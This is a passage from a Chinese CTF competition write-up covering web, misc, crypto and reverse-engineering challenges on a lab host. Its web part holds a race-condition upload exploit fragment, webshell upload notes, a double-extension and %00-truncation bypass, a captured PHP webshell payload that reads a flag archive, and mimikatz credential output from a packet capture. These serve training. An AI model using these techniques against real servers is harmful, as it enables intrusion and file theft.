requests.get(url) </span><br><span class="line">                    code =response.status_code </span><br><span class="line">                    content = response.content </span><br><span class="line">                    <span class="keyword">if</span> code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">&#x27;flag&#x27;</span> <span class="keyword">in</span> content : </span><br><span class="line">                        <span class="built_in">print</span>(content) </span><br><span class="line">                        sign =<span class="number">1</span> </span><br><span class="line">                        <span class="keyword">break</span> </span><br><span class="line">                    <span class="keyword">else</span>: </span><br><span class="line">                        <span class="keyword">break</span> </span><br><span class="line">        <span class="keyword">except</span>: </span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;err&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>: </span><br><span class="line">    p1 =Process(target=file_upload) </span><br><span class="line">    p2 =Process(target=cmd_exp) </span><br><span class="line">    p1.start() </span><br><span class="line">    p2.start() </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="web7"><a href="#web7" class="headerlink" title="web7"></a>web7</h2><p>地址:192.168.4.3<br>端口:30007<br>详情:jlweb7</p>
<p>Robots.txt</p>
<p>下载源码</p>
<p>构造cookie 和get 参数</p>
<p>flag{C0okie &amp; c0de AuDit &amp; Hex}</p>
<h2 id="web10"><a href="#web10" class="headerlink" title="web10"></a>web10</h2><p>地址:192.168.4.3<br>端口:30010<br>详情:jlweb10</p>
<p>日志分析，过滤</p>
<h2 id="black-black"><a href="#black-black" class="headerlink" title="black black"></a>black black</h2><p>地址:192.168.4.3<br>端口:20002<br>详情:black black</p>
<p>上传图片，马</p>
<p>连接木马找到flag </p>
<p>flag{56cae2cc2247daa249c0e4cc8b9b3a05}</p>
<h2 id="web6"><a href="#web6" class="headerlink" title="web6"></a>web6</h2><p>地址:192.168.4.3<br>端口:30006<br>详情:jlweb6</p>
<p>文件上传</p>
<p>flag{mIMetyPe &amp; c0ntent!}</p>
<h2 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h2><p>地址:192.168.4.3<br>端口:30005<br>详情:jlweb5</p>
<p>文件上传，后缀双写</p>
<p>filename=”1.pphphp”</p>
<h2 id="web8"><a href="#web8" class="headerlink" title="web8"></a>web8</h2><p>地址:192.168.4.3<br>端口:30008<br>详情:jlweb8</p>
<p>%00 截断读文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">//被你找到啦 flag&#123;JusT_Cut_1t_Off!&#125;</span><br></pre></td></tr></table></figure>

<h2 id="web33【】"><a href="#web33【】" class="headerlink" title="web33【】"></a>web33【】</h2><p>地址:192.168.4.3<br>端口:12001<br>详情:web33</p>
<h2 id="web55"><a href="#web55" class="headerlink" title="web55"></a>web55</h2><p>地址:192.168.4.3<br>端口:12003<br>详情:web55</p>
<p>反序列化，</p>
<h1 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h1><h2 id="misc1"><a href="#misc1" class="headerlink" title="misc1"></a>misc1</h2><img src="/.io//0081Kckwgy1gk7roh431rj30pg0kcdj5.jpg" alt="confuse" style="zoom:50%;">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">strings confuse.jpg</span><br><span class="line">binwalk </span><br><span class="line"></span><br><span class="line">搜索jpg 文件结尾FFD9</span><br><span class="line">后面的数据一次猜猜 png  zip rar  更改头</span><br><span class="line">最终rar成功</span><br><span class="line">有密码，爆破数字</span><br><span class="line">88488</span><br><span class="line">得到png</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#!coding=utf8</span><br><span class="line"># 爆破宽高</span><br><span class="line">import os</span><br><span class="line">import binascii</span><br><span class="line">import struct</span><br><span class="line"></span><br><span class="line">misc = open(&quot;chocolate.png&quot;, &quot;rb&quot;).read()</span><br><span class="line"></span><br><span class="line">for width in range(4096):</span><br><span class="line">    for height in range(4096):</span><br><span class="line">        data = misc[12:16] + struct.pack(&#x27;&gt;i&#x27;, width) + struct.pack(&#x27;&gt;i&#x27;, height) + misc[24:29]</span><br><span class="line">        crc32 = binascii.crc32(data) &amp; 0xffffffff</span><br><span class="line">        if crc32 == 0x9F26B38:</span><br><span class="line">            print(&#x27;width=&#x27;+str(width)+&#x27;\n&#x27;+&#x27;height=&#x27;+str(height))</span><br><span class="line">            break</span><br><span class="line">    if crc32 == 0x9F26B38:</span><br><span class="line">        break</span><br><span class="line"></span><br><span class="line">print(hex(width),hex(height))</span><br></pre></td></tr></table></figure>



<p><img src="/.io//0081Kckwgy1gk7uegvgpcj303n01r0sn.jpg" alt="image-20201031005001666"></p>
<h2 id="misc3"><a href="#misc3" class="headerlink" title="misc3"></a>misc3</h2><p>流量题</p>
<p>Wireshark, 追踪到HTTP，发现压缩包，解压需要密码，</p>
<p>search password </p>
<p>发现mimikatz 爆密码</p>
<p>wdigest :    </p>
<p>​     * Username : Administrator</p>
<p>​     * Domain   : USER-20180804NL</p>
<p>​     * Password : caibudaodemima</p>
<p>解压得flag</p>
<p>flag{913c79fc074ef505f2302102a86711cb}</p>
<p><img src="/.io//0081Kckwgy1gk7uv7u0pvj308703z0sq.jpg" alt="image-20201031010610850"></p>
<h2 id="Misc4"><a href="#Misc4" class="headerlink" title="Misc4"></a>Misc4</h2><p>发现：</p>
<p>bacoN is one of aMerICa’S sWEethEartS. it’s A dARlinG, SuCCulEnt fOoD tHAt PaIRs FlawLE</p>
<p>aaaab aaaaa aaaba abbba abbab abaaa baaba aaaba abbba abbba ababb aabaa baaab</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf‐8</span></span><br><span class="line"></span><br><span class="line">letters1 = [</span><br><span class="line">    <span class="string">&#x27;A&#x27;</span>, <span class="string">&#x27;B&#x27;</span>, <span class="string">&#x27;C&#x27;</span>, <span class="string">&#x27;D&#x27;</span>, <span class="string">&#x27;E&#x27;</span>, <span class="string">&#x27;F&#x27;</span>, <span class="string">&#x27;G&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;H&#x27;</span>, <span class="string">&#x27;I&#x27;</span>, <span class="string">&#x27;J&#x27;</span>, <span class="string">&#x27;K&#x27;</span>, <span class="string">&#x27;L&#x27;</span>, <span class="string">&#x27;M&#x27;</span>, <span class="string">&#x27;N&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;O&#x27;</span>, <span class="string">&#x27;P&#x27;</span>, <span class="string">&#x27;Q&#x27;</span>, <span class="string">&#x27;R&#x27;</span>, <span class="string">&#x27;S&#x27;</span>, <span class="string">&#x27;T&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;U&#x27;</span>, <span class="string">&#x27;V&#x27;</span>, <span class="string">&#x27;W&#x27;</span>, <span class="string">&#x27;X&#x27;</span>, <span class="string">&#x27;Y&#x27;</span>, <span class="string">&#x27;Z&#x27;</span>,</span><br><span class="line">    ]</span><br><span class="line">letters2 = [</span><br><span class="line">    <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;d&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;g&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;h&#x27;</span>, <span class="string">&#x27;i&#x27;</span>, <span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;k&#x27;</span>, <span class="string">&#x27;l&#x27;</span>, <span class="string">&#x27;m&#x27;</span>, <span class="string">&#x27;n&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;p&#x27;</span>, <span class="string">&#x27;q&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;s&#x27;</span>, <span class="string">&#x27;t&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;u&#x27;</span>, <span class="string">&#x27;v&#x27;</span>, <span class="string">&#x27;w&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;y&#x27;</span>, <span class="string">&#x27;z&#x27;</span>,</span><br><span class="line">    ]</span><br><span class="line">cipher1 = [</span><br><span class="line">    <span class="string">&quot;aaaaa&quot;</span>, <span class="string">&quot;aaaab&quot;</span>, <span class="string">&quot;aaaba&quot;</span>, <span class="string">&quot;aaabb&quot;</span>, <span class="string">&quot;aabaa&quot;</span>, <span class="string">&quot;aabab&quot;</span>, <span class="string">&quot;aabba&quot;</span>,</span><br><span class="line">    <span class="string">&quot;aabbb&quot;</span>, <span class="string">&quot;abaaa&quot;</span>, <span class="string">&quot;abaab&quot;</span>, <span class="string">&quot;ababa&quot;</span>, <span class="string">&quot;ababb&quot;</span>, <span class="string">&quot;abbaa&quot;</span>, <span class="string">&quot;abbab&quot;</span>,</span><br><span class="line">    <span class="string">&quot;abbba&quot;</span>, <span class="string">&quot;abbbb&quot;</span>, <span class="string">&quot;baaaa&quot;</span>, <span class="string">&quot;baaab&quot;</span>, <span class="string">&quot;baaba&quot;</span>, <span class="string">&quot;baabb&quot;</span>,</span><br><span class="line">    <span class="string">&quot;babaa&quot;</span>, <span class="string">&quot;babab&quot;</span>, <span class="string">&quot;babba&quot;</span>, <span class="string">&quot;babbb&quot;</span>, <span class="string">&quot;bbaaa&quot;</span>, <span class="string">&quot;bbaab&quot;</span>,</span><br><span class="line">    ]</span><br><span class="line">cipher2 = [</span><br><span class="line">    <span class="string">&quot;AAAAA&quot;</span>, <span class="string">&quot;AAAAB&quot;</span>, <span class="string">&quot;AAABA&quot;</span>, <span class="string">&quot;AAABB&quot;</span>, <span class="string">&quot;AABAA&quot;</span>, <span class="string">&quot;AABAB&quot;</span>, <span class="string">&quot;AABBA&quot;</span>,</span><br><span class="line">    <span class="string">&quot;AABBB&quot;</span>, <span class="string">&quot;ABAAA&quot;</span>, <span class="string">&quot;ABAAA&quot;</span>, <span class="string">&quot;ABAAB&quot;</span>, <span class="string">&quot;ABABA&quot;</span>, <span class="string">&quot;ABABB&quot;</span>, <span class="string">&quot;ABBAA&quot;</span>,</span><br><span class="line">    <span class="string">&quot;ABBAB&quot;</span>, <span class="string">&quot;ABBBA&quot;</span>, <span class="string">&quot;ABBBB&quot;</span>, <span class="string">&quot;BAAAA&quot;</span>, <span class="string">&quot;BAAAB&quot;</span>, <span class="string">&quot;BAABA&quot;</span>,</span><br><span class="line">    <span class="string">&quot;BAABB&quot;</span>, <span class="string">&quot;BAABB&quot;</span>, <span class="string">&quot;BABAA&quot;</span>, <span class="string">&quot;BABAB&quot;</span>, <span class="string">&quot;BABBA&quot;</span>, <span class="string">&quot;BABBB&quot;</span>,</span><br><span class="line">    ]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">bacon1</span>(<span class="params">string</span>):</span></span><br><span class="line">    lists = []</span><br><span class="line">    letter=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="comment"># 分割，五个一组</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(string), <span class="number">5</span>):</span><br><span class="line">        lists.append(string[i:i+<span class="number">5</span>])</span><br><span class="line">    <span class="comment"># print(lists)</span></span><br><span class="line">    <span class="comment"># 循环匹配，得到下标，对应下标即可</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(lists)):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">26</span>):</span><br><span class="line">            <span class="keyword">if</span> lists[i] == cipher1[j]:</span><br><span class="line">                letter += letters2[j]</span><br><span class="line">    <span class="built_in">print</span> (letter)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">bacon2</span>(<span class="params">string</span>):</span></span><br><span class="line">    lists = []</span><br><span class="line">    letter=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="comment"># 分割，五个一组</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(string), <span class="number">5</span>):</span><br><span class="line">        lists.append(string[i:i+<span class="number">5</span>])</span><br><span class="line">    <span class="comment"># print(lists)</span></span><br><span class="line">    <span class="comment"># 循环匹配，得到下标，对应下标即可</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(lists)):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">26</span>):</span><br><span class="line">            <span class="keyword">if</span> lists[i] == cipher2[j]:</span><br><span class="line">                letter+=letters2[j]</span><br><span class="line">    <span class="built_in">print</span> (letter)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    mi = <span class="string">&#x27;aaaab aaaaa aaaba abbba abbab abaaa baaba aaaba abbba abbba ababb aabaa baaab&#x27;</span></span><br><span class="line">    mi= mi.replace(<span class="string">&quot; &quot;</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    bacon1(mi)</span><br><span class="line">    <span class="comment">#bacon2(&quot;AABABABABAAAAAAAABBA&quot;)</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="代号"><a href="#代号" class="headerlink" title="代号"></a>代号</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">strings 代号.jpg | grep -E .\&#123;6,200\&#125;</span><br><span class="line">无果</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">╭─dong@dongs-MacBook-Pro.local ~/Downloads/4.8上的ctf练习题10.28收集/MISC  </span><br><span class="line">╰─➤  binwalk 代号.jpg               </span><br><span class="line"></span><br><span class="line">DECIMAL       HEXADECIMAL     DESCRIPTION</span><br><span class="line">--------------------------------------------------------------------------------</span><br><span class="line">0             0x0             JPEG image data, JFIF standard 1.01</span><br><span class="line">23949         0x5D8D          Zip archive data, encrypted at least v2.0 to extract, compressed size: 194574, uncompressed size: 200839, name: 1.png</span><br><span class="line">218683        0x3563B         End of Zip archive, footer length: 22</span><br><span class="line"></span><br><span class="line">╭─dong@dongs-MacBook-Pro.local ~/Downloads/4.8上的ctf练习题10.28收集/MISC  </span><br><span class="line">╰─➤  binwalk 代号.jpg -e</span><br><span class="line"></span><br><span class="line">DECIMAL       HEXADECIMAL     DESCRIPTION</span><br><span class="line">--------------------------------------------------------------------------------</span><br><span class="line">0             0x0             JPEG image data, JFIF standard 1.01</span><br><span class="line">23949         0x5D8D          Zip archive data, encrypted at least v2.0 to extract, compressed size: 194574, uncompressed size: 200839, name: 1.png</span><br><span class="line">218683        0x3563B         End of Zip archive, footer length: 22</span><br><span class="line"></span><br><span class="line">爆破 密码9527</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/.io//0081Kckwgy1gk897bpq5jj30b702o0so.jpg" alt="2"></p>
<h2 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h2><p>​    发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0);if(PHP_VERSION&lt;&#x27;5.3.0&#x27;)&#123;@set_magic_quotes_runtime(0);&#125;;echo(&quot;X@Y&quot;);$F=&quot;C:\\wwwroot\\flag.tar.gz&quot;;$fp=@fopen($F,&#x27;r&#x27;);if(@fgetc($fp))&#123;@fclose($fp);@readfile($F);&#125;else&#123;echo(&#x27;ERROR:// Can Not Read&#x27;);&#125;;echo(&quot;X@Y&quot;);die();</span><br></pre></td></tr></table></figure>

<p>返回流取X@Y中间的值保存1.tar.gz ,解压得flag</p>
<p>key{8769fe393f2b998fa6a11afe2bfcd65e}</p>
<h1 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h1><h2 id="jusbbase64"><a href="#jusbbase64" class="headerlink" title="jusbbase64"></a>jusbbase64</h2><blockquote>
<p>考点：base64换表 </p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">VGhlIGdlb@xvZ#kgb@YgdGhlIEVhcnRoJ#Mgc#VyZmFjZSBpcyBkb@!pbmF)ZWQgYnkgdGhlIHBhcnRpY#VsYXIgcHJvcGVydGllcyBvZiB#YXRlci$gUHJlc@VudCBvbiBFYXJ)aCBpbiBzb@xpZCwgbGlxdWlkLCBhbmQgZ@FzZW(!cyBzdGF)ZXMsIHdhdGVyIGlzIGV$Y@VwdGlvbmFsbHkgcmVhY#RpdmUuIEl)IGRpc#NvbHZlcywgdHJhbnNwb#J)cywgYW%kIHByZWNpcGl)YXRlcyBtYW%%IGNoZW!pY@FsIGNvbXBvdW%kcyBhbmQgaXMgY@(uc#RhbnRseSBtb@RpZnlpbmcgdGhlIGZhY@Ugb@YgdGhlIEVhcnRoLiBFdmFwb#JhdGVkIGZyb@)gdGhlIG(jZWFucywgd@F)ZXIgdmFwb#IgZm(ybXMgY@xvdWRzLCBzb@!lIG(mIHdoaWNoIGFyZSB)cmFuc#BvcnRlZCBieSB#aW%kIG(@ZXIgdGhlIGNvbnRpbmVudHMuIENvbmRlbnNhdGlvbiBmcm(tIHRoZSBjbG(!ZHMgcHJvdmlkZXMgdGhlIGVzc@VudGlhbCBhZ@VudCBvZiBjb@%)aW%lbnRhbCBlcm(zaW(uOiByYWluLlRoZSByYXRlIGF)IHdoaWNoIGEgbW(sZWN!bGUgb@Ygd@F)ZXIgcGFzc@VzIHRob#VnaCB)aGUgY#ljbGUgaXMgbm()IHJhbmRvbQpBbmQgdGhlIGZsYWcgaXM^IENURnsyMi!RV)VSVFlVSU*tUExLSkhHRkRTLUFaWENWQk%NfQ== </span><br></pre></td></tr></table></figure>

<p>题将 base64 编码表中的 0123456789 替换成了)!@#$%^&amp;*(</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag is: CTF&#123;22-QWERTYUIO-PLKJHGFDS-AZXCVBNM&#125;</span><br></pre></td></tr></table></figure>





<h1 id="re"><a href="#re" class="headerlink" title="re"></a>re</h1><h2 id="test1"><a href="#test1" class="headerlink" title="test1"></a>test1</h2><p>给serial ,求name,反汇编</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">v6=[<span class="number">16</span>,<span class="number">32</span>,<span class="number">48</span>]</span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> j in range(len(inputname)):</span><br><span class="line">	<span class="keyword">if</span> i&gt;=<span class="number">3</span>:</span><br><span class="line">		i=<span class="number">0</span></span><br><span class="line">	v13 += inputname[j] ^ v6[i]</span><br><span class="line">serial == v13</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">v13 = <span class="string">&quot;5B,13,49,77,13,5E,7D,13&quot;</span></span><br><span class="line">v6 = [<span class="number">16</span>,<span class="number">32</span>,<span class="number">48</span>]</span><br><span class="line">v9 = <span class="string">&quot;&quot;</span></span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> a <span class="keyword">in</span> v13.split(<span class="string">&#x27;,&#x27;</span>):</span><br><span class="line">    v9 += <span class="built_in">chr</span>(<span class="built_in">int</span>(a,<span class="number">16</span>) ^ v6[i])</span><br><span class="line">    i+=<span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> i&gt;=<span class="number">3</span>:</span><br><span class="line">        i=<span class="number">0</span></span><br><span class="line"><span class="built_in">print</span>(v9)</span><br><span class="line"><span class="comment"># K3yg3nm3</span></span><br></pre></td></tr></table></figure>



<h2 id="test2"><a href="#test2" class="headerlink" title="test2"></a>test2</h2><blockquote>
<p>Test.pyc</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">╰─➤  uncompyle6 test2.pyc </span><br><span class="line"># uncompyle6 version 3.7.4</span><br><span class="line"># Python bytecode 2.7 (62211)</span><br><span class="line"># Decompiled from: Python 3.6.12 |Anaconda, Inc.| (default, Sep  8 2020, 17:50:39) </span><br><span class="line"># [GCC Clang 10.0.0 ]</span><br><span class="line"># Embedded file name: 1.py</span><br><span class="line"># Compiled at: 2017-06-03 10:20:43</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line">def encode(message):</span><br><span class="line">    s = &#x27;&#x27;</span><br><span class="line">    for i in message:</span><br><span class="line">        x = ord(i) ^ 32</span><br><span class="line">        x = x + 16</span><br><span class="line">        s += chr(x)</span><br><span class="line"></span><br><span class="line">    return base64.b64encode(s)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">correct = &#x27;XlNkVmtUI1MgXWBZXCFeKY+AaXNt&#x27;</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line">print &#x27;Input flag:&#x27;</span><br><span class="line">flag = raw_input()</span><br><span class="line">if encode(flag) == correct:</span><br><span class="line">    print &#x27;correct&#x27;</span><br><span class="line">else:</span><br><span class="line">    print &#x27;wrong&#x27;</span><br><span class="line"># okay decompiling test2.pyc</span><br></pre></td></tr></table></figure>

<h2 id="test3"><a href="#test3" class="headerlink" title="test3"></a>test3</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> arr[<span class="number">18</span>] =</span><br><span class="line">&#123;</span><br><span class="line">  <span class="number">160</span>,</span><br><span class="line">  <span class="number">230</span>,</span><br><span class="line">  <span class="number">122</span>,</span><br><span class="line">  <span class="number">286</span>,</span><br><span class="line">  <span class="number">230</span>,</span><br><span class="line">  <span class="number">144</span>,</span><br><span class="line">  <span class="number">290</span>,</span><br><span class="line">  <span class="number">208</span>,</span><br><span class="line">  <span class="number">240</span>,</span><br><span class="line">  <span class="number">144</span>,</span><br><span class="line">  <span class="number">300</span>,</span><br><span class="line">  <span class="number">216</span>,</span><br><span class="line">  <span class="number">290</span>,</span><br><span class="line">  <span class="number">244</span>,</span><br><span class="line">  <span class="number">240</span>,</span><br><span class="line">  <span class="number">100</span>,</span><br><span class="line">  <span class="number">256</span>,</span><br><span class="line">  <span class="number">310</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, flag);</span><br><span class="line">  length = <span class="built_in">strlen</span>(flag);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; length; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v3 = (<span class="keyword">unsigned</span> __int8)(flag[i] &gt;&gt; <span class="number">11</span>) &gt;&gt; <span class="number">4</span>;</span><br><span class="line">    a = (<span class="keyword">char</span>)(((v3 + (flag[i] &gt;&gt; <span class="number">4</span>)) &amp; <span class="number">0xF</span>) - v3);</span><br><span class="line">    v4 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(<span class="number">16</span> * flag[i] &gt;&gt; <span class="number">35</span>) &gt;&gt; <span class="number">28</span>;</span><br><span class="line">    b = (((_BYTE)v4 + (<span class="keyword">unsigned</span> __int8)(<span class="number">16</span> * flag[i] &gt;&gt; <span class="number">4</span>)) &amp; <span class="number">0xF</span>) - v4;</span><br><span class="line">    c = <span class="number">22</span> * a + <span class="number">12</span> * b;</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 爆破</span></span><br><span class="line">arr = [<span class="number">0xA0</span>, <span class="number">0xE6</span>, <span class="number">0x7A</span>, <span class="number">0x11E</span>, <span class="number">0xE6</span>, <span class="number">0x90</span>, <span class="number">0x122</span>, <span class="number">0xD0</span>, <span class="number">0xF0</span>, <span class="number">0x90</span>, <span class="number">0x12C</span>, <span class="number">0xD8</span>, <span class="number">0x122</span>, <span class="number">0xF4</span>, <span class="number">0xF0</span>, <span class="number">0x64</span>, <span class="number">0x100</span>, <span class="number">0x136</span>]</span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">18</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">126</span>):</span><br><span class="line">        a = (j &gt;&gt; <span class="number">11</span>) &gt;&gt; <span class="number">4</span></span><br><span class="line">        b = (a + (j &gt;&gt; <span class="number">4</span>) &amp; <span class="number">0xF</span>) -a</span><br><span class="line">        c = (<span class="number">16</span> * j &gt;&gt; <span class="number">35</span>) &gt;&gt; <span class="number">28</span></span><br><span class="line">        d = (c + (<span class="number">16</span> * j &gt;&gt; <span class="number">4</span>) &amp; <span class="number">0xF</span>) -c</span><br><span class="line">        e = <span class="number">22</span> * b + <span class="number">12</span> * d</span><br><span class="line">        <span class="keyword">if</span>(e == arr[i]):</span><br><span class="line">            flag += <span class="built_in">chr</span>(j)</span><br><span class="line"><span 